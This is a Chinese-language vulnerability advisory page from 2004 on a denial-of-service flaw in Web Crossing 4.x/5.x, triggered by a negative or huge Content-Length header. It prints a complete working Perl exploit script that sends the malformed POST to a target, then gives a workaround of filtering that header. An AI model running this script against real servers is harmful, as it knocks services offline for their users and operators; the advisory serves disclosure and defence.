首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Web Crossing 4.x/5.x 拒绝服务漏洞
来源:vfocus.net 作者:vitter 发布时间:2004-02-09  

Web Crossing 4.x/5.x 拒绝服务漏洞

涉及程序:
Web Crossing 4.x/5.x

描述:
Web Crossing 4.x/5.x 拒绝服务漏洞

详细:

web crossing 是世界上的主流服务器合作平台,提供包括讨论小组/ 布告牌的解决办案,综合的新闻组和邮寄名单,详尽的电子邮件服务,日历服务,实时聊天, 现场实况和整个web应用编程特征。

Web Crossing 4.x/5.x对用户请求缺乏过滤,当web-crossing的内嵌式服务器应用程序接到一个HTTP POST的请求的指令时,如果“Content-Length”为这个请求提供一个很大的数或者是负数时,服务器将接到一系列的指令导致无限循环问题,导致服务器因拒绝服务而崩溃。

这种恶意指令可以在at 0090121F中找到:0090121F F7F9 IDIV ECX



攻击方法:

#!/usr/bin/perl -w
#
# Web Crossing 4.x\5.x Denial of Service Exploit
# [ Bad 'Content-Length' Header Bug ]
#
# - by Peter Winter-Smith [peter4020_at_hotmail.com]
use IO::Socket;
if(!($ARGV[0]))
{
print "Usage: wxdos.pl <victim>\n";
exit;
}
print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
"\t[ Bad 'Content-Length' Header Bug ]\n" .
"\t[peter4020\@hotmail.com]\n\n";
$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on " .
"port 80";
$DoS = "POST / HTTP/1.1\r\n" .
"Content-Length: -1\r\n\r\n";
print $victim $DoS;
print "[+] Evil request made to target server ... Waiting...!\n";
sleep(4);
close($victim);
print "[+] Done!\n";
exit;



解决方案:
web-crossing已经得到通知,但目前还没有提供解决方案,建议用户随时关注厂商站点以获取最近补丁或解决方案:

http://www.webcrossing.com

临时解决方案:

通过一些其它应用程序过滤掉'Content-Length'报头





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·CPAN WWW::Form 模块HTML注入漏
·Apache mod_php全局变量信息泄露
·Windows XP Explorer自执行文件
·Apache mod_php 全局变量信息泄
·Apache Web Server 2.0.47访问控
·Apache-SSL 客户端程序可被伪造
·Cisco安全公告 Windows2k Workst
·Sun Solaris TCSetAttr系统挂起
·Linux VServer Project可突破CHR
·RhinoSoft Serv-U Ftp 服务器长
·Apache mod_python 模块畸形请求
·Check Point FW-1 HTTP Security
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved